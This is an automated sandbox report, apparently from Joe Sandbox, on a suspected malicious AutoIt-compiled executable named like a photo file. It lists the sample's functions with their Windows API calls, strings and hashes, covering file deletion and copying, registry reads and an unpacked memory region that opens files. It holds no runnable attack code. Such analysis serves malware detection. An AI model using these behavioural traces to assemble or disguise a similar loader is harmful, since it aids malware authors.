Part of subcall function 00DA922F: _memmove.LIBCMT ref: 00DA9277

_wcscmp.LIBCMT ref: 00DA9479

Part of subcall function 00DA99BE: _wcscmp.LIBCMT ref: 00DA9AAE
Part of subcall function 00DA99BE: _wcscmp.LIBCMT ref: 00DA9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DA96DC
_wcsncpy.LIBCMT ref: 00DA974F
DeleteFileW.KERNEL32(?,?), ref: 00DA9785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA97BE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: e31e1359ff576ae5ac4f93e896af38f079d6ffe349c581a0c95afa7163132d85
Instruction ID: 4a271d44cc19ea21d8076187b10e967527dad86b8309ce6ca57c189bbb929de2
Opcode Fuzzy Hash: e31e1359ff576ae5ac4f93e896af38f079d6ffe349c581a0c95afa7163132d85
Instruction Fuzzy Hash: 84C118B1D00229ABDF21DFA5CC95ADEB7BDEF45310F0440AAF609E6151EB309A848F75

Function 00D43015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D43074
RegisterClassExW.USER32(00000030), ref: 00D4309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
LoadIconW.USER32(000000A9), ref: 00D430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101

Strings

TaskbarCreated, xrefs: 00D430A4
+, xrefs: 00D4305D
0, xrefs: 00D43056
AutoIt v3 GUI, xrefs: 00D43090

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: efcfcb7a9f55fce9f769a72da1fc447fe4cf975afb27308713013e737fbd7d79
Instruction ID: 9476cb02fdf6d4748b6bce81a2f836183b349a727883305f6bf19f0b0a486c2f
Opcode Fuzzy Hash: efcfcb7a9f55fce9f769a72da1fc447fe4cf975afb27308713013e737fbd7d79
Instruction Fuzzy Hash: 25314BB184530AEFDB41DFA4DC89BD9BBF5FB08310F10852AE540E62A0D7B60595CF60

Function 00D43041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D43074
RegisterClassExW.USER32(00000030), ref: 00D4309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
LoadIconW.USER32(000000A9), ref: 00D430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101

Strings

TaskbarCreated, xrefs: 00D430A4
+, xrefs: 00D4305D
0, xrefs: 00D43056
AutoIt v3 GUI, xrefs: 00D43090

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 68a40f2d0beab81e3264576edbeee49cc3a16b7d79287ef7dce3a11f90a96067
Instruction ID: f08b194c9844265eded6eeffe9bcf702d31260ffb6b800e3e8c2391628bece82
Opcode Fuzzy Hash: 68a40f2d0beab81e3264576edbeee49cc3a16b7d79287ef7dce3a11f90a96067
Instruction Fuzzy Hash: 3D21B7B190031AAFDB00DF95E849BDDBBF5FB08700F10852AF511E63A0D7B245988FA5

Function 00D471EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D44864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E062F8,?,00D437C0,?), ref: 00D44882

Part of subcall function 00D6074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00D472C5), ref: 00D60771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D47308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D7ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D7ED32
RegCloseKey.ADVAPI32(?), ref: 00D7ED70
_wcscat.LIBCMT ref: 00D7EDC9

Strings

\, xrefs: 00D7EDEC
\Include\, xrefs: 00D472C5
Software\AutoIt v3\AutoIt, xrefs: 00D472FE
Include, xrefs: 00D7ECE8, 00D7ED29

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 18fb836bd55beec90a5e1766c3ab913534e1352dac783d5554fff3f81e29931f
Instruction ID: f63270ecbf2920a05223f13cb0c88b654b9a22a177d874d6f9345576c2840c2c
Opcode Fuzzy Hash: 18fb836bd55beec90a5e1766c3ab913534e1352dac783d5554fff3f81e29931f
Instruction Fuzzy Hash: C2713FB19083019FC714EF66DC419ABBBE8FF59740B44492EF485931B1EB71A988CB71

Function 00D43A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D43A62
LoadCursorW.USER32(00000000,00007F00), ref: 00D43A71
LoadIconW.USER32(00000063), ref: 00D43A88
LoadIconW.USER32(000000A4), ref: 00D43A9A
LoadIconW.USER32(000000A2), ref: 00D43AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D43AD2
RegisterClassExW.USER32(?), ref: 00D43B28

Part of subcall function 00D43041: GetSysColorBrush.USER32(0000000F), ref: 00D43074
Part of subcall function 00D43041: RegisterClassExW.USER32(00000030), ref: 00D4309E
Part of subcall function 00D43041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
Part of subcall function 00D43041: InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
Part of subcall function 00D43041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
Part of subcall function 00D43041: LoadIconW.USER32(000000A9), ref: 00D430F2
Part of subcall function 00D43041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101

Strings

#, xrefs: 00D43B0D
AutoIt v3, xrefs: 00D43B17
0, xrefs: 00D43B06

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 8db9ca7aaf00be1079722ecf7602f32ed349adf52f4df99468ff57dce3c76e79
Instruction ID: 549fe10122c78a1ccaf1ce4eeabbfc8c8d4e489fe9933d03a33dcf2a6ff5cfcd
Opcode Fuzzy Hash: 8db9ca7aaf00be1079722ecf7602f32ed349adf52f4df99468ff57dce3c76e79
Instruction Fuzzy Hash: F7211C71900305EFEB119FA5EC09B9D7BB5EB08711F104129F504BA2B0D7B655A88F64

Function 00D43778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 00D4388F
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00D437C0
b, xrefs: 00D7D44E
/AutoIt3ExecuteLine, xrefs: 00D438B9
/AutoIt3ExecuteScript, xrefs: 00D438CE
CMDLINERAW, xrefs: 00D4380D
/AutoIt3OutputDebug, xrefs: 00D438A4
CMDLINE, xrefs: 00D43834

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
API String ID: 1825951767-3834736419
Opcode ID: 4ae1380e8c24ddf992dcf9b8323304ca7d56aa8eb8b4d8ca363bf24018aea6ad
Instruction ID: d1130b17b07318731a42726799a665940e045fcb002ed049c0c307268b80b75f
Opcode Fuzzy Hash: 4ae1380e8c24ddf992dcf9b8323304ca7d56aa8eb8b4d8ca363bf24018aea6ad
Instruction Fuzzy Hash: 12A14B719102299BCB04EBA5CC92EEEB779FF14300F44052AF416B7192EF75AA49CB70

Function 00D43633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00D436D2
KillTimer.USER32(?,00000001), ref: 00D436FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D4371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D4372A
CreatePopupMenu.USER32 ref: 00D4373E
PostQuitMessage.USER32(00000000), ref: 00D4375F

Strings

TaskbarCreated, xrefs: 00D43725

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 232ed1767d93996cef792f4e9bf4b065030455058dabe5198dd6200f8a534a99
Instruction ID: f9a1705f688a79ade942c8aba4506a5dfb248f2cb3ac162c768d0fd6c2597246
Opcode Fuzzy Hash: 232ed1767d93996cef792f4e9bf4b065030455058dabe5198dd6200f8a534a99
Instruction Fuzzy Hash: 9641F5B1200206AFDF146F6CDC4ABB93766EB40340F184129F986E63E2DA65DEA49771

Function 010825C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01082691
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010828B7

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: 1ab893f033526ec51c46cbc2ea26f4d150d3c0462f794b93b9476edf0754e38d
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: C0A11974E05209EBDF14EFA4C894BEEBBB5BF48704F208199E581BB280C7759A41CF50

Function 00D4F8CF Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D603A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D603D3
Part of subcall function 00D603A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D603DB
Part of subcall function 00D603A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D603E6
Part of subcall function 00D603A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D603F1
Part of subcall function 00D603A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D603F9
Part of subcall function 00D603A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D60401

Part of subcall function 00D56259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00D4FA90), ref: 00D562B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D4FB2D
OleInitialize.OLE32(00000000), ref: 00D4FBAA
CloseHandle.KERNEL32(00000000), ref: 00D849F2

Strings

\d, xrefs: 00D4F957
c, xrefs: 00D4F94B
<g, xrefs: 00D4FA90

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <g$\d$c
API String ID: 1986988660-2468412954
Opcode ID: 5d6740395d17fe24205e8f3a5ca698121c747f5cd906efc65606fd9e85836e6d
Instruction ID: fdb44a93b466640b2e65f7a6d8fd87ff8ba097c3dc87396afa51fb981c98fa00
Opcode Fuzzy Hash: 5d6740395d17fe24205e8f3a5ca698121c747f5cd906efc65606fd9e85836e6d
Instruction Fuzzy Hash: 6E81C8B09002518FC784EF6BED917157BE5FB98308314952AD428EB3A2EB3644ECCF60

Function 00D439E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D43A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D43A36
ShowWindow.USER32(00000000,?,?), ref: 00D43A4A
ShowWindow.USER32(00000000,?,?), ref: 00D43A53

Strings

AutoIt v3, xrefs: 00D43A0D, 00D43A12, 00D43A13
edit, xrefs: 00D43A30

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 65e0e1a12b448d19223030a83baa6ec21ece4515b324362dbad9d43cfd7bbc1c
Instruction ID: a3be0ae8e7ba6cd28d7eab996410681172afb4a1033aaaba60349ec8406ea087
Opcode Fuzzy Hash: 65e0e1a12b448d19223030a83baa6ec21ece4515b324362dbad9d43cfd7bbc1c
Instruction Fuzzy Hash: 89F0DA71641291BFEA3117276C4DF672E7ED7C6F50B00412EB904F62B0C6B618A5DAB0

Function 010823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010822A0: Sleep.KERNELBASE(000001F4), ref: 010822B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010824AE

Strings

859Z1EBEL4XKMZ, xrefs: 01082511, 01082514

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateFileSleep
String ID: 859Z1EBEL4XKMZ
API String ID: 2694422964-3194543315
Opcode ID: 07b5d29b73607cf3221413967ec5cc608707ab5e5992a7a32af3d5ad18772c21
Instruction ID: 99b16ea6f742ecce887877004466829343b641acc7d905574492b307e59de62e
Opcode Fuzzy Hash: 07b5d29b73607cf3221413967ec5cc608707ab5e5992a7a32af3d5ad18772c21
Instruction Fuzzy Hash: 50518230D04259DBEF11EBE4C814BEEBBB4AF54300F004199E649BB2C0DB750B45CBA5

Function 00D4410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D7D5EC

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

_memset.LIBCMT ref: 00D4418D
_wcscpy.LIBCMT ref: 00D441E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D441F1

Strings

Line: , xrefs: 00D7D615

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: c62adb675cb028a74d1fa2f3c6b55f6a2f5920a4714d5f297bda7a87f1395373
Instruction ID: 2c455ba1d43705179f37f96dbcdc17332cb8c314766f2d12dc6341fc132c1e83
Opcode Fuzzy Hash: c62adb675cb028a74d1fa2f3c6b55f6a2f5920a4714d5f297bda7a87f1395373
Instruction Fuzzy Hash: B331C071008315AFE721EB60DC86FDB77E8EF54300F14461AF1C9A20A1EB70A698C7B6

Function 00D6564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D656AB
_memcpy_s.LIBCMT ref: 00D6571D
__read_nolock.LIBCMT ref: 00D6577B
__filbuf.LIBCMT ref: 00D6579E
_memset.LIBCMT ref: 00D657E2

Part of subcall function 00D68D68: __getptd_noexit.LIBCMT ref: 00D68D68

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: b37477baa571d8b0a9364f0c212cfe5309c75ba2e8809b7b6e38b4228901c93b
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: F751B334A00B05DFDB248FA9E88066E77A1EF40320F288729F866962D8D7709D95DB70

Function 00D469CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00D44F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44F6F

_free.LIBCMT ref: 00D7E68C
_free.LIBCMT ref: 00D7E6D3

Part of subcall function 00D46BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D46D0D

Strings

Bad directive syntax error, xrefs: 00D7E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 00D7E462

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: eba7ab92f2c2c2bddc174e8de1eeffab896df1880e52653bb1ab9b4512546b66
Instruction ID: 1640e41595c191a9f3b397c821c8371c9f119e1e4487aef2f67de1db9e16d781
Opcode Fuzzy Hash: eba7ab92f2c2c2bddc174e8de1eeffab896df1880e52653bb1ab9b4512546b66
Instruction Fuzzy Hash: 09913C71910219AFCF04EFA4C8919EDB7B5FF19314F14846AF85AAB291EB30E945CB70

Function 00D435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00D435A1,SwapMouseButtons,00000004,?), ref: 00D435D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00D435A1,SwapMouseButtons,00000004,?,?,?,?,00D42754), ref: 00D435F5
RegCloseKey.KERNELBASE(00000000,?,?,00D435A1,SwapMouseButtons,00000004,?,?,?,?,00D42754), ref: 00D43617

Strings

Control Panel\Mouse, xrefs: 00D435D2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: ed1829bc00798a8ecbda3036d878ed25fc3d76af8036f999efcb163d05edc541
Instruction ID: e46b1f365048463a0c9b2a32740bf2042e3a3a60c745d70dc32977cb87778b23
